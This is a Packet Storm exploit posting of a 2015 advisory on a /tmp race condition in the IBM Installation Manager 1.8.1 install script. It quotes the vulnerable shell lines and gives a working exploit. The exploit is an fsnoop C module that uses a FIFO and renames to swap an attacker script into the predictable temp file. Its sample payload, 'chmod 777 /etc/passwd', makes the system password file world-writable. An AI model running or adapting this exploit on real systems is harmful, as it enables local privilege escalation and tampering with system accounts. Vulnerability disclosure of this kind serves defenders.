exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IBM Installation Manager 1.8.1 Race Condition

IBM Installation Manager 1.8.1 Race Condition
Posted Nov 12, 2015
Authored by Larry W. Cashdollar

The install script for IBM Installation Manager version 1.8.1 suffers from a /tmp race condition.

tags | exploit
SHA-256 | 61ddc1ecef489ff69c00edb7ed3182af444a773253d7beed708c57be0d98de12

IBM Installation Manager 1.8.1 Race Condition

Change Mirror Download
Title: /tmp race condition in IBM Installation Manager V1.8.1 install script
Author: Larry W. Cashdollar, @_larry0
Date: 2015-10-29
Download Site: http://www-03.ibm.com/software/products/en/appserv-wasfordev
Vendor: IBM
Vendor Notified: 0000-00-00
Vendor Contact:
Description: IBM Installation Manager is a command line utility to install
various software packages developed by IBM.

=====> IBM Installation Manager> Password required

Credentials are required to connect to the IBM download site. Enter IBM ID
and password.

Select:
P. Provide credentials and connect
C. Cancel

Select 'P' to enter credentials and connect, or 'C' to cancel.

Forgot your IBM ID?
https://www.ibm.com/account/profile?page=forgotuid
Forgot your password?
https://www.ibm.com/account/profile?page=forgot
IBM ID help and FAQ
https://www.ibm.com/account/profile/us/en?page=regfaqhelp
-----> C
Vulnerability:
I noticed a /tmp race condition in IBM¹s installation manager software
install script
The code in consoleinst.sh is:


46 TEMP=/tmp
47 tempScript=$TEMP/consoleinst-$$.sh
48 scriptLoc=`dirname "$0"`
49 slash=`expr "$scriptLoc" : "\(/\)"`
50 if [ "X$slash" != "X/" ]; then
51 scriptLoc=`pwd`/$scriptLoc
52 fi
53
54 if [ "$0" != "$tempScript" ]; then
55 cp "$0" "$tempScript"
56 cd "$TEMP"
57 origScriptLoc=$scriptLoc
58 export origScriptLoc
59 exec "$tempScript" $@
60 # should not return from above exec
61 exit 1
62 fi


If you guess the pid and create the file before the installer script does
you can inject code to be executed at line 59.

This is a log of me controlling permissions of the file during installation
of the product:

[M] -rwxrwxrwx 1 larry larry 34 Thu Oct 29 21:46:10 2015
/tmp/consoleinst-9999.sh
[U] -rwxrwxrwx 1 larry larry 0 Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh
[U] -rwxrwxrwx 1 larry larry 2225 Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh

If I'm able to write to that file directly after it's modifed (inotify() for
the win) I could inject commands into that installation script.
CVEID:
OSVDB:
Exploit Code:
/*
fsnoop v3.3 module for exploitation of:
http://www.vapidlabs.com/advisory.php?v=156
special thanks to v14dz for getting this working, and Mudge @dotmudge for
pointing me
at his /tmp race condition tool l0pht-watch.

@v14dz
http://vladz.devzero.fr/

$ make ibm-console.so

/tmp/x is :

#!/bin/sh
chmod 777 /etc/passwd

$ ./fsnoop -p ibm-consoleinst.so
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **
[+] ./ibm-consoleinst.so: payload=[0xb77775fb]
file=[/tmp/consoleinst-HEREPID.sh]
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"
[+] ./ibm-consoleinst.so: Exploitation done.
[+] ./ibm-consoleinst.so: Unloading module.

ls -l /etc/passwd
-rwxrwxrwx 1 root root 1901 Nov 22 2014 /etc/passwd

*/



#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

char title[] = "** IBM Console Install Exploit **";

/* filters */
char proc_name[] = "/bin/sh ./consoleinst.sh";
char file[] = "/tmp/consoleinst-HEREPID.sh";

/* Evil routines */
void payload() {
int fd;
/*from v14dz: I use a fifo here, to unlock the paymod execution right after
the cp command*/
mkfifo(file, 0666);
fd = open(file, O_RDONLY);
rename(file, "/tmp/a");
rename("/tmp/x", file);
}
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=156


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close